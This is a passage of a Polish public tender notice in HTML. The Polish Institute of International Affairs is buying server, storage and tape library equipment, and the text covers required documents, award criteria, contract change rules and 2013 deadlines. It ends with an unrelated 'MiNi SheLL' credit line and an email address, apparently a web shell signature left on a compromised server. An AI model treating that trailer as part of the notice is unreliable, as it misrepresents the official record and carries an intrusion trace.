2)	pełnomocnictwo do podpisania oferty, w tym do podpisania wszystkich oświadczeń i dokumentów składanych wraz z ofertą.
3)	oświadczenie o spełnianiu warunków udziału w postępowaniu, zgodnie ze wzorem stanowiącym Załącznik nr 3 lub Załącznik nr 3 a do SIWZ - Oświadczenie Wykonawcy.
4)	oświadczenie o braku podstaw do wykluczenia, zgodnie ze wzorem, stanowiącym Załącznik nr  4 lub Załącznik nr 4 a  do SIWZ - Oświadczenie Wykonawcy.
5)	  oświadczenie o przynależności lub nie do grupy kapitałowej, zgodnie ze wzorem, stanowiącym Załącznik nr 8 do SIWZ,   
6)	  zaakceptowany przez Wykonawcę projekt umowy, stanowiący Załącznik nr 9 do SIWZ.
7)	pozostałe wymagane dokumenty określone w pkt VII SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana istotnych postanowień Umowy w stosunku do treści Oferty Wykonawcy, możliwa jest tylko i wyłącznie na warunkach i w zakresie określonym poniżej: 
a)	w przypadku zaistnienia siły wyższej uniemożliwiającej wykonanie Przedmiotu Umowy w terminie określonym w § 3 ust. 1 lub § 3 ust. 2 Umowy - dopuszcza się możliwość zmiany terminu wykonania Przedmiotu Umowy poprzez jego wydłużenie o czas odpowiadający czasowi występowania siły wyższej; na potrzeby Umowy Strony przyjmują, iż siłą wyższą jest zdarzenie zewnętrzne, którego nie można było przewidzieć, analizując i uwzględniając wszystkie okoliczności sprawy, jak również, któremu nie można było zapobiec znanymi, normalnie stosowanymi sposobami, a w szczególności: wojna, wojna domowa, zamieszki, rozruchy i akty sabotażu; katastrofy naturalne takie jak silne burze, huragany, trzęsienia ziemi, powodzie, piorun; wybuchy, pożar, zniszczenie maszyn, fabryki lub wszelkiego rodzaju instalacji; bojkot, strajk, lockout; akty władzy państwowej;
b)	 w przypadku konieczności zrealizowania Przedmiotu Umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmianę obowiązującego prawa lub właściwych norm lub w związku z zaistnieniem szczególnych okoliczności, których Strony nie mogły przewidzieć przy zawieraniu Umowy - dopuszcza się możliwość zmiany opisu Przedmiotu Zamówienia w stosunku do opisu zawartego w OPZ SIWZ oraz terminów wykonania Przedmiotu Umowy określonych w § 3 ust. 1 i 2 ;
c)	 w przypadku konieczności zawieszenia wykonywania Przedmiotu Umowy z przyczyn leżących po stronie Zamawiającego - dopuszcza się zmianę terminów wykonania Przedmiotu Umowy określonych w § 3 ust. 1 i 2;
d)	 w przypadku wystąpienia w toku realizacji Przedmiotu Umowy niemożliwych do przewidzenia okoliczności nadzwyczajnych, niezależnych od Wykonawcy, skutkujących koniecznością wstrzymania realizacji Przedmiotu Umowy, w szczególności takich jak: awarie sieci wodociągowych, ciepłowniczych, gazowych lub elektrycznych, uniemożliwiające prowadzenie prac zgodnie z przepisami prawa lub właściwymi normami, - dopuszcza się zmianę terminów wykonania Przedmiotu Umowy określonych w § 3 ust. 1 i 2 ;
e)	 w przypadku zmiany obowiązującej stawki VAT - dopuszcza się możliwość odpowiedniej do zmiany przepisów podatkowych zmiany Umowy.
f)	konieczność dostarczenia innych, niż określone w umowie towarów spowodowana zakończeniem produkcji określonych w umowie towarów lub wycofaniem ich z produkcji lub obrotu na terytorium Rzeczypospolitej Polskiej, o ile parametry zaoferowanego towaru są nie gorsze niż określone w ofercie Wykonawcy.
g)	pojawienie się na rynku urządzeń producenta sprzętu nowszej generacji, o lepszych parametrach i pozwalających na zaoszczędzenie kosztów eksploatacji pod warunkiem, że takie zmiany nie spowodują zwiększenia ceny;
h)	wprowadzenie nowej wersji oprogramowania przez producenta, oprogramowania wykorzystywanego przez Wykonawcę do realizacji zamówienia, zmiany warunków licencjonowania oprogramowania przez producenta lub dystrybutora;
2.	Nie stanowią zmiany Umowy w rozumieniu art. 144 PZP w szczególności następujące przypadki: 
a)	zmiana osób, przy pomocy których Wykonawca lub Zamawiający realizuje Przedmiot Umowy, w tym Upoważnionych Przedstawicieli;
b)	zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana numeru rachunku bankowego Wykonawcy); 
c)	zmiana danych teleadresowych Stron; 
d)	zmiana danych rejestrowych Stron; 
e)	zmiana sposobu prowadzenia korespondencji pomiędzy Stronami;
3.	Wszelkie zmiany umowy wymagają porozumienia Stron poprzedzonego pisemnym wnioskiem jednej ze Stron zawierającego propozycję zmiany oraz uzasadnienie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pism.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Polski Instytut Spraw Międzynarodowych
ul. Warecka 1 a, 00-950 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.11.2013 godzina 10:00, miejsce: Polski Instytut Spraw Międzynarodowych
ul. Warecka 1 a, 00-950 Warszawa
(I piętro recepcja).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zakup serwera i macierzy wraz z oprogramowaniem, montażem i instalacją na potrzeby Biblioteki Cyfrowej Polskiego Instytutu Spraw Międzynarodowych w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa  serwera, macierzy wraz z oprogramowaniem, montażem i instalacją na potrzeby biblioteki cyfrowej w Polskim Instytucie Spraw Międzynarodowych w Warszawie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.82.00.00-2, 30.23.31.41-1, 30.23.30.00-1, 30.23.31.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zakup biblioteki taśmowej wraz z oprogramowaniem, montażem i instalacją na potrzeby Biblioteki Cyfrowej Polskiego Instytutu Spraw Międzynarodowych w Warszawie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa biblioteki taśmowej wraz z oprogramowaniem, montażem i instalacją na potrzeby biblioteki cyfrowej w Polskim Instytucie Spraw Międzynarodowych w Warszawie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.31.60-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.12.2013.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com